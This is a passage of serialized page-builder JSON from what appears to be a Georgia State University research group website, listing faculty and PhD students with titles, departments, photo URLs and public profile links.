-1-e1697202215204.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1701,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c12\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":2,\"id\":\"182-c13\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c14\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c15\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c16\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c17\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":692,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c18\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":2,\"id\":\"182-c19\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c20\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c21\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c22\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c23\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\",\"caption\":{\"text\":\"\"},\"imageId\":1704,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c24\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":2,\"id\":\"182-c25\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c26\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c27\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c28\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c29\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c30\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":2,\"id\":\"182-c31\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c32\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c33\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c34\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c35\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-bourgeois-e1697143389924.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1675,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c36\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":2,\"id\":\"182-c37\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c38\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c39\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c40\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c41\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/cropped-cropped-hu_new-1-e1697143455517.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1677,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c42\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":2,\"id\":\"182-c43\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c44\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c45\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c46\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c47\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-cropped-patterson-e1697143515399.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1679,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c48\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":2,\"id\":\"182-c49\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c50\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c51\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c52\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c53\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Taylor-shelton_300x300-e1697143561739.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1681,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c54\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":2,\"id\":\"182-c55\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c56\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c57\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c58\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c59\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-Hassan-Babaie-300x300-1-e1697143646400.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1682,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c60\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Hassan Babaie\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":2,\"id\":\"182-c61\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c62\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/geosciences.gsu.edu\\/profile\\/hassan-babaie\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Hassan-Babaie\\/4\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c63\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c3\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c2\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c66\",\"parentId\":\"182-c65\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c65\",\"parentId\":\"182-c64\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c64\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c69\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c70\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-282038166_2492815234187345_4129762528023780269_n-e1697142834100.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1659,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c71\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c69\",\"index\":2,\"id\":\"182-c72\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c69\",\"index\":3,\"id\":\"182-c73\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c69\",\"index\":1,\"id\":\"182-c74\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c75\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c76\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-IMG_1240-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1336,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c75\",\"index\":2,\"id\":\"182-c78\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c75\",\"index\":3,\"id\":\"182-c79\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c81\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c82\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Emma.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":966,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c81\",\"index\":2,\"id\":\"182-c84\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c85\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c87\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c88\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/anupam.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1624,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anupam Sarker<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c87\",\"index\":2,\"id\":\"182-c90\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c87\",\"index\":3,\"id\":\"182-c91\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anupam-sarker-b164b412a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c92\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c93\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c94\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Ardavan.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":863,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c95\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassini\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c93\",\"index\":2,\"id\":\"182-c96\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c93\",\"index\":3,\"id\":\"182-c97\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c93\",\"index\":1,\"id\":\"182-c98\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c99\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c100\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Jean.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1094,\"size\":\"\"},\"domuuid\":\"182-c79\"